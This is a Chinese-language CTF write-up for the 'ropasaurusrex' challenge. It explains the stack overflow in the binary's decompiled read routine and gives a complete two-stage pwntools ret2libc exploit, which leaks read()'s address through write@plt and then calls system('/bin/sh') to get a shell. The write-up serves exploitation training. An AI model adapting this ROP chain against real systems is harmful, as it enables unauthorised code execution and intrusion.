ropasaurusrex

32位动态链接ELF文件,no RELRO,no canary,no PIE

查看main函数

/* Decompiler output. main() first runs the input routine sub_80483F4 and
 * only afterwards prints "WIN\n" to stdout (fd 1). The return value of
 * sub_80483F4 (the number of bytes read) is discarded, so a short or
 * oversized read is never checked here. */
ssize_t __cdecl main()
{
  sub_80483F4();   /* reads attacker-controlled input; see below */
  return write(1, "WIN\n", 4u);
}

查看sub_80483F4

/* Decompiler output. Reads from stdin (fd 0) into a fixed-size stack buffer.
 * buf holds 136 (0x88) bytes and sits at ebp-0x88, but read() is allowed to
 * copy up to 0x100 (256) bytes, so the saved ebp and the return address
 * can be overwritten. With no stack canary (per the binary's properties
 * noted above) nothing detects the overwrite before the function returns. */
ssize_t sub_80483F4()
{
  char buf[136]; // [esp+10h] [ebp-88h] BYREF

  return read(0, buf, 0x100u);   /* 0x100 > sizeof(buf): stack overflow */
}

buf 只有 136 字节,而 read 最多读入 0x100 字节,是非常明显的栈溢出;题目中有 read 和 write 函数

因此首先先通过write函数泄露read函数的地址,然后重新运行程序,构造rop链获得shell

exp如下

# Two-stage ret2libc exploit for the ropasaurusrex training binary (pwntools).
# Stage 1 leaks the resolved address of read() from the GOT via write@plt;
# stage 2 re-enters main and uses the computed libc base to call system("/bin/sh").
# Note: the binary ships without a stack canary and without PIE. A canary would
# abort the process before the overwritten return address is used, and PIE
# would invalidate every hard-coded address below.
from pwn import *

io = process('./ropasaurusrex')   # run the challenge binary locally
elf = ELF('./ropasaurusrex')
# pwntools picks the libc the local loader maps for this binary; the symbol
# offsets used below only hold if the target process runs this same libc.
libc = elf.libc
#libc = ELF('./libc.so.6')   # alternative: a libc file shipped with the challenge
# Fixed addresses taken from the (non-PIE) binary.
write_plt = 0x804830C
read_got = 0x804961C
read_plt = 0x804832C   # not used by this script
main_addr = 0x804841D
goal_addr = 0x8049700  # not used by this script

# 0x8c = 0x88 (buf is at ebp-0x88) + 4 (saved ebp): the next 4 bytes replace
# the return address of sub_80483F4. Chain: write(1, read_got, 4), then
# "return" into main so the program accepts a second input.
payload = b'a' * 0x8c + p32(write_plt) + p32(main_addr)
payload += p32(1) + p32(read_got) + p32(4)
io.send(payload)
# The 4 bytes written are the GOT entry of read(), i.e. its runtime address.
read_addr = u32(io.recv(4))
info('read_addr: 0x%x' % read_addr)
# libc base = leaked address - offset of read() inside libc.
libc_base = read_addr - libc.symbols['read']
info('libc_base: 0x%x' % libc_base)
system_addr = libc_base + libc.symbols['system']
info('system_addr: 0x%x' % system_addr)
# First occurrence of the "/bin/sh" string inside the mapped libc.
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
info('binsh_addr: 0x%x' % binsh_addr)

# Stage 2 (second run through main): same overflow, return address -> system,
# main_addr as system's return address, binsh_addr as its single argument.
payload = b'a' * 0x8c + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
io.send(payload)

io.interactive()

 
